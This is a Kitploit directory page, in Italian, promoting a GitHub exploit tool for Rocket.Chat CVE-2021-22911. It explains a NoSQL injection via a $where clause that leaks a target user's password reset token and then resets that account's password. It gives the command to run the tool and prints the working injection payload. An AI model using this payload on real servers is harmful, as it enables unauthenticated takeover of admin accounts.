Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RocketChat-NoSQLi-Chain-CVE-2021-22911 — Exploit automatizzato per l'iniezione NoSQL di Rocket.Chat (CVE-2021-22911) che perde i token di reset password ed esegue il takeover dell'account non autenticato. | Kitploit
Strumenti/GitHubGitHub/tenebrae93/rocketchat-nosqli-chain-cve-2021-22911
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubtenebrae93/rocketchat-nosqli-chain-cve-2021-22911

RocketChat-NoSQLi-Chain-CVE-2021-22911

Exploit automatizzato per l'iniezione NoSQL di Rocket.Chat (CVE-2021-22911) che perde i token di reset password ed esegue il takeover dell'account non autenticato.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
16 mesi faNon ancora revisionato

Rocket.Chat NoSQLi Token Leak e Reset Password

Uno script di exploit automatizzato per Rocket.Chat (e applicazioni basate su Meteor) che sfrutta una NoSQL Injection tramite la clausola $where per divulgare token di reset password attraverso eccezioni lato server. Una volta divulgato il token, lo script esegue un reset password non autenticato.

Panoramica della Vulnerabilità

  1. Autenticazione: Lo script si autentica come utente standard per ottenere accesso all'endpoint /api/v1/users.list.

  2. NoSQL Injection: Utilizza il parametro query per iniettare una clausola JavaScript $where.

  3. Data Exfiltration: Utilizzando l'istruzione throw all'interno dell'iniezione, costringe il server a restituire un errore 'eccezione non catturata' contenente il token di reset password dell'utente target.

  4. Acquisizione dell'account: Lo script utilizza il token divulgato per chiamare resetPassword, cambiando la password dell'account target.

Utilizzo

Prerequisiti

  • Python 3.x

  • Libreria requests

Bash

root@kitploit:~
pip install requests

Esecuzione

Bash

root@kitploit:~
python3 exploit.py --url http://<TARGET_IP>:3000\
                   -u <YOUR_USER>\
                   -p <YOUR_PASS>\
                   -a <TARGET_ADMIN_USER>\
                   -ap <NEW_ADMIN_PASSWORD>

Argomenti della riga di comando

Dettaglio della catena dell'exploit

Il cuore dell'exploit è la stringa di iniezione:

JavaScript

root@kitploit:~
{"$where":"this.username==='admin' && (()=>{ throw this.services.password.reset.token })()"}

Quando viene elaborato dal server, il motore del database esegue la funzione anonima, si blocca sull'istruzione throw, e l'applicazione cattura l'eccezione, passando involontariamente il token segreto all'utente nella risposta di errore JSON.

Scarica lo strumento
ArgomentoFlag LungoDescrizione
-u--userIl tuo nome utente o email validi per l'autenticazione iniziale.
-p--passwordLa tua password valida.
-a--adminIl nome utente dell'account che vuoi resettare.
-ap--admin-passLa nuova password da impostare per l'account admin.
--urlL'URL di base dell'istanza Rocket.Chat.